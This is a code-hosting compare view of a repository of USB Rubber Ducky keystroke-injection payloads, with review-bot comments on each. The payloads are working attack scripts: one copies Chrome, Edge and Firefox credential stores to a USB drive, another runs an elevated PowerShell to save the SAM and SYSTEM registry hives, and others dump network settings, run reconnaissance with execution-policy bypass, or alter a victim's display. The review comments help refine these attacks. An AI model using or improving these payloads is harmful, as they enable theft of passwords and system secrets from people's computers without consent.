27 Commits
c71b83afca
...
acc8dd6ea8
Author | SHA1 | Date |
---|---|---|
Mark | acc8dd6ea8 | |
Peaks | 44af31e74b | |
Mavis Coffey | cacb21ad7e | |
Mavis Coffey | 61eb88ab6c | |
Mavis Coffey | 8be0f9a092 | |
Mavis Coffey | 63e0c18618 | |
Mavis Coffey | 81807425f5 | |
Mavis Coffey | 083951025f | |
Mavis Coffey | 1a5aa0bd08 | |
Mavis Coffey | a323fc3281 | |
Mavis Coffey | 420a174f93 | |
Mavis Coffey | c8c6a75d33 | |
Mavis Coffey | 4e89426355 | |
Mavis Coffey | 566683c428 | |
Mavis Coffey | 5ed41467e3 | |
Mavis Coffey | a74d21e848 | |
Mavis Coffey | 0f85a6936e | |
Mavis Coffey | d9baab6395 | |
Mavis Coffey | cf0c83d37c | |
Mavis Coffey | 8293bf5d4d | |
Mavis Coffey | 6ad0b7836c | |
mavisinator30001 | 8073d4d9cd | |
Mark | f843113663 | |
Mark | 81260982f1 | |
Mark | 582bb6138a | |
Mark | 5b5c57f16b | |
Mark | ddd7d2af4b |
|
@ -0,0 +1,63 @@
|
||||||
|
REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
|
||||||
|
REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
|
||||||
|
REM %%%%%%%%%%%%%% Title: CredentialHarvester %%%%%%%%%%%%%%
|
||||||
|
REM %%%%%%%%%%%%%% Author: github.com/markcyber %%%%%%%%%%%%%%
|
||||||
|
REM %%%%%%%%%%%%%% Description: This script exfiltrates credentials %%%%%%%%%%%%%%
|
||||||
|
REM %%%%%%%%%%%%%% Target: Firefox, Chrome, Edge on Windows Machines %%%%%%%%%%%%%%
|
||||||
|
REM %%%%%%%%%%%%%% Category: Exfiltration %%%%%%%%%%%%%%
|
||||||
|
REM %%%%%%%%%%%%%% This script requires a secondary USB named "MYUSB" to save credentials to %%%%%%%%%%%%%%
|
||||||
|
REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
|
||||||
|
REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
|
||||||
|
REM Open PowerShell with elevated privileges
|
||||||
|
DELAY 1000
|
||||||
|
GUI r
|
||||||
|
DELAY 500
|
||||||
|
STRING powershell
|
||||||
|
DELAY 500
|
||||||
|
ENTER
|
||||||
|
DELAY 1500
|
||||||
|
REM Check if the USB drive exists
|
||||||
|
STRING $usbDrive = Get-WmiObject Win32_Volume ^| Where-Object { $_.Label -eq 'MYUSB' } ^| Select-Object -ExpandProperty DriveLetter;
|
||||||
|
ENTER
|
||||||
|
DELAY 500
|
||||||
|
STRING if ($usbDrive -ne $null) {
|
||||||
|
ENTER
|
||||||
|
DELAY 500
|
||||||
|
STRING cd $usbDrive
|
||||||
|
ENTER
|
||||||
|
DELAY 500
|
||||||
|
STRING mkdir BrowserData
|
||||||
|
ENTER
|
||||||
|
DELAY 500
|
||||||
|
STRING cd BrowserData
|
||||||
|
ENTER
|
||||||
|
DELAY 500
|
||||||
|
REM Copy Chrome Login Data to USB
|
||||||
|
STRING $chromePath = "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Login Data"
|
||||||
|
ENTER
|
||||||
|
STRING if (Test-Path $chromePath) { Copy-Item $chromePath "$usbDrive\BrowserData\ChromeLoginData" }
|
||||||
|
ENTER
|
||||||
|
DELAY 500
|
||||||
|
REM Copy Firefox Login Data to USB
|
||||||
|
STRING $firefoxPath = "$env:APPDATA\Mozilla\Firefox\Profiles\"
|
||||||
|
ENTER
|
||||||
|
STRING if (Test-Path $firefoxPath) { Copy-Item $firefoxPath -Recurse "$usbDrive\BrowserData\FirefoxData" }
|
||||||
|
ENTER
|
||||||
|
DELAY 500
|
||||||
|
REM Copy Edge Login Data to USB
|
||||||
|
STRING $edgePath = "$env:LOCALAPPDATA\Microsoft\Edge\User Data\Default\Login Data"
|
||||||
|
ENTER
|
||||||
|
STRING if (Test-Path $edgePath) { Copy-Item $edgePath "$usbDrive\BrowserData\EdgeLoginData" }
|
||||||
|
ENTER
|
||||||
|
DELAY 500
|
||||||
|
STRING }
|
||||||
|
ENTER
|
||||||
|
DELAY 500
|
||||||
|
REM Clear the clipboard to remove any sensitive data (This is not necessary, unless you did something on target PC)
|
||||||
|
STRING echo off ^| clip
|
||||||
|
ENTER
|
||||||
|
DELAY 500
|
||||||
|
REM Close PowerShell
|
||||||
|
STRING exit
|
||||||
|
ENTER
|
||||||
|
DELAY 500
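Review bot: The comment `REM Open PowerShell with elevated privileges` (L80) does not describe the keystrokes that follow it: `GUI r` → `powershell` → `ENTER` opens a standard, non-elevated console, and nothing in the hunk triggers a UAC prompt. The `Copy-Item` calls only read files under the current user's `%LOCALAPPDATA%` and `%APPDATA%`, so elevation is not required, and the comment should say what actually happens rather than promise more: `REM Open a standard (non-elevated) PowerShell window via the Run dialog`. The `Description` header (L56) likewise overstates the payload — the Chromium `Login Data` files and the Firefox profile directory are copied as-is, with their stored passwords still in encrypted form, so `copies the browser credential stores to the USB` is the accurate wording.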
|
|
@ -0,0 +1,12 @@
|
||||||
|
# IP-OUT
|
||||||
|
This is a USB Rubber Ducky payload that opens a powershell window in the target (Windows based) computer, then extracts the `ipconfig` information in the form of a text file saved on the USB.
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
## Useful Tips
|
||||||
|
|
||||||
|
**Change #DRIVELABEL to your own personal drive label if it isn't already**
|
||||||
|
|
||||||
|
Remember: Do not use this for unethical hacking practices! This is for educational purposed only!
|
|
@ -0,0 +1,63 @@
|
||||||
|
REM Title: IP-Out
|
||||||
|
REM Author: Mavisinator30001
|
||||||
|
REM Description: Opens a powershell window and prints the current IP of the device to a text file in the BadUSB
|
||||||
|
REM Target: Any Windows System
|
||||||
|
REM DISCLAIMER!!! Neither I, nor Hak5, condone any unethical hacking practices using this payload... FOR EDUCATIONAL PURPOSES ONLY
|
||||||
|
DEFINE #DRIVELABEL DUCKY
|
||||||
|
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||||
|
REM VERSION 1.1
|
||||||
|
REM AUTHOR: Korben
|
||||||
|
|
||||||
|
REM_BLOCK DOCUMENTATION
|
||||||
|
Windows fully passive OS Detection and passive Detect Ready
|
||||||
|
Includes its own passive detect ready.
|
||||||
|
Does not require additional extensions.
|
||||||
|
|
||||||
|
USAGE:
|
||||||
|
Extension runs inline (here)
|
||||||
|
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||||
|
boot delay
|
||||||
|
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||||
|
See end of payload for usage within payload
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
REM CONFIGURATION:
|
||||||
|
DEFINE #MAX_WAIT 150
|
||||||
|
DEFINE #CHECK_INTERVAL 20
|
||||||
|
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||||
|
DEFINE #NOT_WINDOWS 7
|
||||||
|
|
||||||
|
$_OS = #NOT_WINDOWS
|
||||||
|
|
||||||
|
VAR $MAX_TRIES = #MAX_WAIT
|
||||||
|
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||||
|
DELAY #CHECK_INTERVAL
|
||||||
|
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||||
|
END_WHILE
|
||||||
|
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||||
|
$_OS = WINDOWS
|
||||||
|
END_IF
|
||||||
|
|
||||||
|
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||||
|
IF ($_OS == WINDOWS) THEN
|
||||||
|
STRING HELLO WINDOWS!
|
||||||
|
ELSE
|
||||||
|
STRING HELLO WORLD!
|
||||||
|
END_IF
|
||||||
|
END_REM
|
||||||
|
END_EXTENSION
|
||||||
|
IF $_OS != WINDOWS
|
||||||
|
STOP_PAYLOAD
|
||||||
|
END_IF
|
||||||
|
ATTACKMODE HID STORAGE
|
||||||
|
DELAY 500
|
||||||
|
GUI r
|
||||||
|
DELAY 300
|
||||||
|
STRINGLN Powershell
|
||||||
|
DELAY 1000
|
||||||
|
STRINGLN $driveLetter = (Get-WmiObject -Query "SELECT * FROM Win32_Volume WHERE Label='#DRIVELABEL'").DriveLetter; if ($driveLetter) { ipconfig | Out-File -Filepath "$driveLetter\exfil.txt" -Encoding utf8 }
|
||||||
|
WAIT_FOR_STORAGE_ACTIVITY
|
||||||
|
WAIT_FOR_STORAGE_INACTIVITY
|
||||||
|
ALT F4
|
||||||
|
ATTACKMODE OFF
|
||||||
|
HIDE_PAYLOAD
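Review bot: `ATTACKMODE HID STORAGE` (L537) is issued only after `EXTENSION PASSIVE_WINDOWS_DETECT` has already returned, so the re-enumeration that adds the storage interface is covered by nothing but the fixed `DELAY 500` before `GUI r`, and the WMI lookup for `#DRIVELABEL` at L561 can run before the volume is mounted — `$driveLetter` is then empty, nothing is written, and `WAIT_FOR_STORAGE_ACTIVITY` would wait on a write that never happens. The System Stealer payload in this same compare declares `ATTACKMODE HID STORAGE` before the extension, which matches the extension's own usage note (`Place at beginning of payload (besides ATTACKMODE) to act as dynamic boot delay`); moving the line to directly after `DEFINE #DRIVELABEL DUCKY` makes the two payloads consistent and lets the detection loop double as the enumeration wait. Separately, `IF $_OS != WINDOWS` (L525) drops the parentheses and `THEN` that the extension's own example uses; if the compiler requires them the guard fails to build, so prefer `IF ($_OS != WINDOWS) THEN`.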
|
|
@ -0,0 +1,74 @@
|
||||||
|
REM TITLE System Stealer
|
||||||
|
REM AUTHOR mavisinator30001
|
||||||
|
REM DESCRIPTION Creates a file in the Duck called sam.save and system.save with encrypted system information in both
|
||||||
|
REM DISCLAIMER Neither I, nor Hak5, condone any unethical hacking practices, whether taken from this payload or otherwise!
|
||||||
|
REM DISCLAIMER This is for educational purposes ONLY
|
||||||
|
DELAY 1000
|
||||||
|
ATTACKMODE HID STORAGE
|
||||||
|
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||||
|
REM VERSION 1.1
|
||||||
|
REM AUTHOR: Korben
|
||||||
|
|
||||||
|
REM_BLOCK DOCUMENTATION
|
||||||
|
Windows fully passive OS Detection and passive Detect Ready
|
||||||
|
Includes its own passive detect ready.
|
||||||
|
Does not require additional extensions.
|
||||||
|
|
||||||
|
USAGE:
|
||||||
|
Extension runs inline (here)
|
||||||
|
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||||
|
boot delay
|
||||||
|
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||||
|
See end of payload for usage within payload
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
REM CONFIGURATION:
|
||||||
|
DEFINE #MAX_WAIT 150
|
||||||
|
DEFINE #CHECK_INTERVAL 20
|
||||||
|
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||||
|
DEFINE #NOT_WINDOWS 7
|
||||||
|
|
||||||
|
$_OS = #NOT_WINDOWS
|
||||||
|
|
||||||
|
VAR $MAX_TRIES = #MAX_WAIT
|
||||||
|
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||||
|
DELAY #CHECK_INTERVAL
|
||||||
|
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||||
|
END_WHILE
|
||||||
|
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||||
|
$_OS = WINDOWS
|
||||||
|
END_IF
|
||||||
|
|
||||||
|
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||||
|
IF ($_OS == WINDOWS) THEN
|
||||||
|
STRING HELLO WINDOWS!
|
||||||
|
ELSE
|
||||||
|
STRING HELLO WORLD!
|
||||||
|
END_IF
|
||||||
|
END_REM
|
||||||
|
END_EXTENSION
|
||||||
|
REM Change $DRIVELABEL to the storage label of your duck
|
||||||
|
DEFINE #DRIVELABEL DUCKY
|
||||||
|
IF ($_OS == WINDOWS) THEN
|
||||||
|
GUI r
|
||||||
|
DELAY 500
|
||||||
|
STRING powershell
|
||||||
|
DELAY 1000
|
||||||
|
CTRL-SHIFT-ENTER
|
||||||
|
DELAY 750
|
||||||
|
LEFT
|
||||||
|
ENTER
|
||||||
|
DELAY 1000
|
||||||
|
STRINGLN $DriveLetter = (Get-WmiObject -Query "SELECT * FROM Win32_LogicalDisk WHERE VolumeName='#DRIVELABEL'").DeviceID; Set-Variable -Name 'DriveLetter' -Value $DriveLetter -Scope Global; Write-Output $DriveLetter
|
||||||
|
DELAY 250
|
||||||
|
STRINGLN reg save HKLM\sam $DriveLetter/sam.save
|
||||||
|
WAIT_FOR_STORAGE_ACTIVITY
|
||||||
|
WAIT_FOR_STORAGE_INACTIVITY
|
||||||
|
STRINGLN reg save HKLM\system $DriveLetter/system.save
|
||||||
|
WAIT_FOR_STORAGE_ACTIVITY
|
||||||
|
WAIT_FOR_STORAGE_INACTIVITY
|
||||||
|
ALT F4
|
||||||
|
ELSE
|
||||||
|
ATTACKMODE OFF
|
||||||
|
STOP_PAYLOAD
|
||||||
|
END_IF
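Review bot: The configuration comment `REM Change $DRIVELABEL to the storage label of your duck` (L778) names a variable that does not exist; the constant defined on the next line and substituted into the WMI query at L826 is `#DRIVELABEL`, so a user following the comment edits the wrong thing. Suggest `REM Change #DRIVELABEL below to the volume label of the Duck's storage partition`. The IP-OUT README in this same compare already documents the constant as `#DRIVELABEL`, so this keeps the two payloads consistent.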
|
|
@ -0,0 +1,5 @@
|
||||||
|
# Resolution Prank
|
||||||
|
|
||||||
|
This payload will go into windows based systems and change the resolution of the victim to the lowest possible setting. When finished, the LED will flash red and green, and at that point if you hit CAPS it will reset the monitor to the highest resolution allowed.
|
||||||
|
|
||||||
|
### Somewhat resource dependent, may not work on older computers
|
|
@ -0,0 +1,103 @@
|
||||||
|
REM TITLE Resolution Prank
|
||||||
|
REM AUTHOR Mavisinator30001
|
||||||
|
REM TARGET Any system running Windows 10/11
|
||||||
|
REM DESCRIPTION Goes into Windows settings and change the screen resolution. When finished, toggle caps to change display back
|
||||||
|
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||||
|
REM VERSION 1.1
|
||||||
|
REM AUTHOR: Korben
|
||||||
|
|
||||||
|
REM_BLOCK DOCUMENTATION
|
||||||
|
Windows fully passive OS Detection and passive Detect Ready
|
||||||
|
Includes its own passive detect ready.
|
||||||
|
Does not require additional extensions.
|
||||||
|
|
||||||
|
USAGE:
|
||||||
|
Extension runs inline (here)
|
||||||
|
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||||
|
boot delay
|
||||||
|
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||||
|
See end of payload for usage within payload
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
REM CONFIGURATION:
|
||||||
|
DEFINE #MAX_WAIT 150
|
||||||
|
DEFINE #CHECK_INTERVAL 20
|
||||||
|
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||||
|
DEFINE #NOT_WINDOWS 7
|
||||||
|
|
||||||
|
$_OS = #NOT_WINDOWS
|
||||||
|
|
||||||
|
VAR $MAX_TRIES = #MAX_WAIT
|
||||||
|
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||||
|
DELAY #CHECK_INTERVAL
|
||||||
|
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||||
|
END_WHILE
|
||||||
|
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||||
|
$_OS = WINDOWS
|
||||||
|
END_IF
|
||||||
|
|
||||||
|
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||||
|
IF ($_OS == WINDOWS) THEN
|
||||||
|
STRING HELLO WINDOWS!
|
||||||
|
ELSE
|
||||||
|
STRING HELLO WORLD!
|
||||||
|
END_IF
|
||||||
|
END_REM
|
||||||
|
END_EXTENSION
|
||||||
|
IF $_OS != WINDOWS
|
||||||
|
STOP_PAYLOAD
|
||||||
|
END_IF
|
||||||
|
LED_G
|
||||||
|
DELAY 500
|
||||||
|
CTRL GUI d
|
||||||
|
DELAY 500
|
||||||
|
GUI i
|
||||||
|
DELAY 2000
|
||||||
|
STRINGLN display
|
||||||
|
DELAY 2500
|
||||||
|
TAB
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
REPEAT 8 TAB
|
||||||
|
ENTER
|
||||||
|
VAR $CAPS_STATE = $_CAPSLOCK_ON
|
||||||
|
WHILE ($CAPS_STATE == $_CAPSLOCK_ON)
|
||||||
|
HOLD DOWN
|
||||||
|
DELAY 1000
|
||||||
|
RELEASE DOWN
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
LEFT
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
|
||||||
|
REM WHEN FINISHED WITH THE FIRST PART OF THE PAYLOAD DUCK WILL FLASH LED
|
||||||
|
VAR $LIGHT_UP_TIMES = 20
|
||||||
|
WHILE ($LIGHT_UP_TIMES > 0)
|
||||||
|
LED_G
|
||||||
|
DELAY 300
|
||||||
|
LED_OFF
|
||||||
|
DELAY 300
|
||||||
|
LED_R
|
||||||
|
DELAY 300
|
||||||
|
LED_OFF
|
||||||
|
DELAY 300
|
||||||
|
$LIGHT_UP_TIMES = $LIGHT_UP_TIMES - 1
|
||||||
|
END_WHILE
|
||||||
|
WAIT_FOR_CAPS_CHANGE
|
||||||
|
END_WHILE
|
||||||
|
DELAY 300
|
||||||
|
REPEAT 12 TAB
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
HOLD UP
|
||||||
|
DELAY 1000
|
||||||
|
RELEASE UP
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
LEFT
|
||||||
|
ENTER
|
||||||
|
DELAY 1000
|
||||||
|
ALT F4
|
||||||
|
DELAY 200
|
||||||
|
CTRL GUI F4
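Review bot: The CAPS toggle the README promises ("at that point if you hit CAPS it will reset") is not honored while the LED is blinking: the `$LIGHT_UP_TIMES` loop at L1195–L1235 runs 20 passes of 4 × 300 ms (about 24 s) before `WAIT_FOR_CAPS_CHANGE` at L1239 is reached, and if that command waits for a change relative to the state at entry, a CAPS press during the blink is swallowed and a second press is needed to exit. The outer `WHILE ($CAPS_STATE == $_CAPSLOCK_ON)` (L1148) already encodes the exit condition, so the fixed-count blink and the `WAIT_FOR_CAPS_CHANGE` can be replaced by a blink loop that polls that same condition and ends on the first toggle; the outer loop then exits on its own re-check. This also removes the `$LIGHT_UP_TIMES = $LIGHT_UP_TIMES - 1` line, which is the only arithmetic in the compare written without the parenthesized `($X - 1)` form the extension uses. The excerpt assumes nested `WHILE` blocks are accepted by the compiler, which I believe DuckyScript 3 supports.
```duckyscript
REM … unchanged: resolution change through Settings (GUI i … LEFT / ENTER) …
REM Blink red/green until CAPS is toggled; the outer WHILE sees the changed
REM $_CAPSLOCK_ON on its next check and falls through to the restore sequence.
WHILE ($CAPS_STATE == $_CAPSLOCK_ON)
    LED_G
    DELAY 300
    LED_OFF
    DELAY 300
    LED_R
    DELAY 300
    LED_OFF
    DELAY 300
END_WHILE
REM … unchanged: outer END_WHILE and the resolution restore sequence …
```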
|
|
@ -0,0 +1,629 @@
|
||||||
|
REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
|
||||||
|
REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
|
||||||
|
REM %%%%%%%%%%%%%% Title: VulnerabilityScanner %%%%%%%%%%%%%%
|
||||||
|
REM %%%%%%%%%%%%%% Author: Github.com/MarkCyber %%%%%%%%%%%%%%
|
||||||
|
REM %%%%%%%%%%%%%% Description: This script scans for vulnerabilities %%%%%%%%%%%%%%
|
||||||
|
REM %%%%%%%%%%%%%% Target: Windows machines with admin access %%%%%%%%%%%%%%
|
||||||
|
REM %%%%%%%%%%%%%% Category: Recon %%%%%%%%%%%%%%
|
||||||
|
REM %%%%%%%%%%%%%% This script requires a secondary USB named "MYUSB" to save credentials to %%%%%%%%%%%%%%
|
||||||
|
REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
|
||||||
|
REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
|
||||||
|
DELAY 1000
|
||||||
|
REM Open Start Menu
|
||||||
|
CONTROL ESCAPE
|
||||||
|
DELAY 2000
|
||||||
|
STRING powershell
|
||||||
|
REM Navigate to the context menu to run PowerShell as an administrator
|
||||||
|
DELAY 500
|
||||||
|
RIGHTARROW
|
||||||
|
DELAY 100
|
||||||
|
DOWNARROW
|
||||||
|
DELAY 100
|
||||||
|
ENTER
|
||||||
|
DELAY 3000
|
||||||
|
ALT Y
|
||||||
|
DELAY 5000
|
||||||
|
REM Set PowerShell Execution Policy to Bypass
|
||||||
|
DELAY 1000
|
||||||
|
STRING set-executionpolicy bypass -scope process -force
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
REM Create the PowerShell script in memory and execute it
|
||||||
|
DELAY 200
|
||||||
|
STRING $usbName = "MYUSB"
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING $usbDrive = Get-WmiObject Win32_Volume | Where-Object { $_.Label -eq $usbName } | Select-Object -ExpandProperty DriveLetter
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING if ($usbDrive) {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING $owner = (Get-WmiObject Win32_ComputerSystem).UserName
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING $directoryPath = Join-Path -Path $usbDrive -ChildPath $owner
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING New-Item -ItemType Directory -Path $directoryPath
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING $resultsFilePath = Join-Path -Path $directoryPath -ChildPath "results.txt"
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING "" > $resultsFilePath
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING function check-passwordpolicy {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING try {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING net accounts
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING } catch {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING write-output "Error checking password policy: $_"
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING }
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING }
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING function audit-services {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING try {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING get-service | select-object name, displayname, status, starttype
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING } catch {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING write-output "Error auditing services: $_"
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING }
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING }
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING function check-networksettings {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING try {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING get-netipconfiguration
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING } catch {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING write-output "Error checking network settings: $_"
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING }
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING }
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING function check-softwarevulnerabilities {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING try {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING get-itemproperty hklm:\software\wow6432node\microsoft\windows\currentversion\uninstall\* | select-object displayname, displayversion, publisher
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING } catch {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING write-output "Error checking software vulnerabilities: $_"
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING }
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING }
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING function check-cve {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING param (
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING [string]$productname,
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING [string]$version
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING )
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING $initialDelay = 2
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING try {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING $uri = "https://services.nvd.nist.gov/rest/json/cves/1.0?keyword=$productname+$version"
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING start-sleep -seconds $initialDelay
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING $response = invoke-restmethod -uri $uri -method get
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING if ($response.totalresults -gt 0) {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING foreach ($cve in $response.result.cve_items) {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING "$($cve.cve.cve_data_meta.id) - $($cve.cve.description.description_data[0].value)"
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING }
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING } else {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING "no cves found for $productname $version"
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING }
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING } catch {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING write-output "Error checking CVEs: $_"
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
